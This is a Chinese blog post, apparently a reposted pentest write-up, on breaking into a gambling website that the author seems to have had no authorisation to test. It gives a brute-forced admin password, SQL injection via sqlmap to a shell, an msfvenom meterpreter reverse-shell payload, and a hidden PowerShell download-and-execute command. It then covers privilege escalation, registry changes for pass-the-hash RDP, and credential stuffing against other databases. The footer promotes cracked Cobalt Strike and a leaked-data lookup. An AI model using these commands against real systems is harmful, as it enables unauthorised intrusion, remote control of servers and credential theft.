查看原文
其他

对某菠菜的渗透测试笔记

kone 刨洞安全团队 2024-02-21

闲着无聊,网上随便找了一个菠菜进行简单测试,并做笔记记录,大佬们轻喷,有什么不足之处请指教。

弱口令

访问网站就是一个登录页面,没有验证码直接 bp 开启,成功爆出弱口令 admin/123456,直接进入后台。

sql注入获取权限

翻看了很多功能点,在一处功能点发现上传接口,并尝试上传文件,发现无法上传,加了白名单。直接选择放弃,继续寻找。在某一个 /GroupMember.aspx?gid= 参数上加上单引号,直接报错,SQL 注入这不就来了么。

说干就干,直接 SQLMAP

发现为 MSSQL,且 DBA 权限,直接 --os-shell

上线msf

已经获取普通权限,接下来就是上线 msf 提权。msf 生成 powershell 脚本,并放置在网站目录下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection >xx.ps1

Vps 开启监听

使用 powershell 上线 session

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))"

如果想要通过 url 拼接堆叠执行 powershell 会存在一个问题,就是单引号闭合问题。我们可以通过对 powershell 进行编码一下,这样就可以绕过单引号的问题。下面推荐一个不错的网站。

https://r0yanx.com/tools/java_exec_encode/

提权

session 已经上线,接下来目标就是获取 system 权限。很幸运直接 getsystem 可以获取 system 权限。如果需要提权推荐土豆家族提权,实战中成功率很高,影响的服务器版本也很多。

迁移一下进程,防止进程掉线。

远程登录服务器

发现服务器开启 3389 端口,因为是 system 权限,且为 2012 系统,大于 2008 版本都是无法抓到明文密码,直接修改 adminnistrator 密码。(实战中不推荐直接修改管理员密码)

利用hash远程登录管理员账号

因为是 win2012 无法获取明文密码,直接修改管理员密码稍有些不妥。尝试通过获取管理员 NTLM 远程登录机器。(并非同一台,这只是提供一个思路)

使用 hash 远程登录 RDP,需要开启 "Restricted Admin Mode"

// 开启Restricted Admin mode
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

// 查看是否已开启,0x0则表示开启
REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin"

成功利用 hash 远程管理员桌面

其他

前期发现 1433 端口开放着,寻找数据库配置文件,登录数据库。

通过 fofa 找了一下,资产还是挺多的,且很多都开放 1433 端口,猜测会存在同一个人部署的网站,尝试用获取的密码对这些资产的 1433 端口进行爆破,成功撞到几台数据库,且都是 sa 权限。结束。


本文作者:kone原文地址:https://xz.aliyun.com/t/12501


关注公众号后台回复 0001 领取域渗透思维导图,0002 领取VMware 17永久激活码,0003 获取SGK地址,0004 获取在线ChatGPT地址,0005 获取 Windows10渗透集成环境,0006 获取 CobaltStrike 4.9.1破解版


加我微信好友,邀请你进交流群





往期推荐



对某金融App的加解密hook+rpc+绕过SSLPinning抓包

疑似境外黑客组织对CSDN、吾爱破解、bilibili等网站发起DDoS攻击

Fofa新产品 - 绕CDN溯源真实IP!

Cobalt Strike 4.8 正式发布上线!

团队在线Windows进程识别正式内测

突发!微信疑似存在RCE

绕过AV进行UserAdd的方法总结及实现

某次近源攻击到内网漫游拿下域控以及Vcenter

某次以目的为导向的内网渗透-取开发源码

APT29利用CVE-2023-38831攻击大使馆

微信PC客户端存在@全体逻辑错误

APK逆向分析入门-以某斗地主APP为例

发现新恶意团伙"紫狐"!针对finalshell的供应链事件

《永结无间》客户端RCE漏洞

Confluence CVE-2023-22515漏洞复现

域渗透之NTLM Relay

COM接口学习与利用

日常记录对某站点的实战渗透

Java审计之CMS中的那些反序列化漏洞

备用号,欢迎关注


继续滑动看下一个

对某菠菜的渗透测试笔记

向上滑动看下一个

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存